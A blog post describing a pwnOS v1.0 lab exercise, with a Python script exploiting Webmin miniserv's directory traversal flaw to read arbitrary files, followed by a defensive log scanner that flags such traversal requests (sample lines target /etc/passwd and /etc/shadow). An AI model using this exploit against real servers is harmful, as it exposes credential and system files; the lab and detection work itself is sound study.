Saturday, March 8, 2014

pwnOS v1.0 Python Script for Reading files through Directory Traversal

I was working with the pwnOS v1.0 to be able to gain root. One of the steps was to use a directory traversal flaw in miniserv to read files on the filesystem. I liked the Metasploit module but I found that I wanted a quicker script and something I could save the output with. I then designed the following script using Python:


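# This script was built off of the concept of the Metasploit auxiliary plugin
# for displaying files on Webmin due to a directory traversal vulnerability.
# This allows you to put in place the file that you would like to pull and
# retrieve it quicker than if you are in Metasploit. You can also redirect
# the output to a file.

import socket
import sys

# The connection details did not survive in the post; these are placeholders.
TARGET_HOST = "TARGET_IP"   # placeholder: address of the pwnOS lab VM
TARGET_PORT = 10000         # assumption: Webmin's default miniserv port

if len(sys.argv) > 1:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET_HOST, TARGET_PORT))

    # Found that the %01 can be substituted for other characters.
    url = "/unauthenticated/" + "/..%01" * 40 + sys.argv[1]

    httpRequest = "GET " + url + " HTTP/1.1\n"
    httpRequest += "Host:\n\n"
    s.sendall(httpRequest.encode())

    # Read the response in 1 KB chunks and print it so it can be redirected.
    for i in range(1, 15):
        data = s.recv(1024)
        if not data:
            break
        print(data.decode(errors="replace"))
    s.close()
else:
    print("Usage: ./ file")
    print("The file in this case is any file on the file system you can pull.\n\n")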
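A defender-side complement to the script above, added here and not part of the original post: a small log scanner that normalises request paths so that `..%01` and variants using other filler bytes all reduce to a plain `..` segment. The log format, sample lines and function names are constructed for illustration, and it assumes the substituted filler is a control byte.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (not captured from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Mar/2014:10:00:01 +0000] '
    '"GET /unauthenticated//..%01/..%01/..%01/etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.7 - - [08/Mar/2014:10:00:02 +0000] '
    '"GET /unauthenticated/images/logo.gif HTTP/1.1" 200 512',
    '10.0.0.5 - - [08/Mar/2014:10:00:03 +0000] '
    '"GET /unauthenticated//..%0b/..%0b/etc/shadow HTTP/1.1" 200 900',
    '10.0.0.9 - - [08/Mar/2014:10:00:04 +0000] '
    '"GET /docs/v1..2/notes.txt HTTP/1.1" 200 77',
]

REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalise(path):
    """Percent-decode (up to three layers), then drop control bytes."""
    raw = path.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(3):              # peel nested encodings such as %252e
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    # Remove bytes below 0x20 and DEL: '..\x01' becomes '..'
    raw = bytes(b for b in raw if b >= 0x20 and b != 0x7F)
    return raw.decode("latin-1").replace("\\", "/")

def is_traversal(path):
    """True if any path segment is exactly '..' after normalisation."""
    return ".." in normalise(path).split("/")

def scan(lines):
    """Return the raw request paths that normalise to a traversal."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if m and is_traversal(m.group(1)):
            hits.append(m.group(1))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("traversal attempt:", hit)
```

Matching on whole segments rather than the substring `..` keeps names such as `v1..2` from raising false alerts.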
